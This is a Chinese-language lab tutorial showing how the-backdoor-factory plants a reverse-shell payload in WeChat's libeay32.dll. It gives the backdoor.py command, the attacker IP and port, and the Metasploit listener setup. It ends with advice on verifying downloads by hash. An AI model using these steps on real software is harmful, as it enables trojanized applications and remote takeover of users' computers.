the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload。
测试靶机环境,win7系统,wechat(微信)2.6.8
靶机ip:192.168.190.129
目标:利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门,等微信运行之后,反弹shell到攻击机
1,靶机安装微信,记录下安装路径
2,使用Process Explorer进程管理器,找到微信进程,查看微信运行所需要的dll文件,找到微信安装路径下的任意一个文件,本次实验将利用libeay32.dll文件
3,将文件复制到kali下任意目录,我直接复制到the-backdoor-factory-master下方便使用
4,运行the-backdoor-factory-master,输入命令,./backdoor.py -f libeay32.dll,查找可利用的pyload,可以看到检测到了,有不少可植入的pyload
5,因为这次目的是获得shell,所以选择使用reverse_shell_tcp_lnline这个pyload,输入命令./backdoor.py -f libeay32.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.190.134,
-P,指定端口
-H,指定反弹shell的攻击机ip地址
6,命令执行成功,会列出可植入后门的位置,这里植入位置,我选择4,data数据位置
7,植入完成,会将生成的有后门的文件,会存在工具自带的backdoored目录下,生成一个同名的dll文件
9,将生成的有后门的文件,放在靶机的微信安装目录下,会发现新生成的文件大小,跟默认自带的大小不一样
10,打开kali的postgresql数据库服务,之后运行msf,来监听反弹的shell
输入命令,server postgresql start
输入命令,msfconsole,启动msf渗透测试框架
11,输入命令,use exploit/multi/handler,进入到handler
输入命令 set payload windows/shell_reverse_tcp,设置利用windows系统下的shell_reverse_tcp脚本
输入命令,show options,显示利用脚本需要设置的信息
12,输入命令 ,set lhost 192.168.190.134,设置监听的主机
输入命令,set lport 6666,设置监听的端口
13,输入命令exploit开始执行脚本
14,打开靶机,运行微信,微信会提示dll文件缺失,重新运行安装微信,会提示已经安装,点击确定覆盖安装
15,覆盖安装完成,运行微信,发现后门已经成功执行,成功反弹出来了,这个有后门的微信机器的shell
16,可以执行任意的windows系统命令,比如,whoami,发现是个administrator用户
总结,the-backdoor-factory-master是个强大且方便的后门植入工具,提供的脚本生成检测,后门植入方法使用很简单,请广大网友下载使用软件时候一定要在官网下载,有能力的话下载的文件就看官网提供的md5等hash值跟自己下载的软件程序的hase值进行对比,确定程序没有修改再安装,如果突然发现自己的程序运行提示有报错,缺少文件一类的,请务必将之前的程序卸载干净,删除残留文件,清理无效注册表之后再安装,不要只是点击覆盖安装